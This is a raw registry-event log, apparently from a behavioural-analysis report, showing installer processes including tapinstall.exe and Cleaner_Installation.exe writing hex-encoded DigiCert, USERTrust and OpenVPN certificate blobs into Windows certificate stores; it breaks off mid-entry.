0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner_Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Cleaner_Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner_Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f706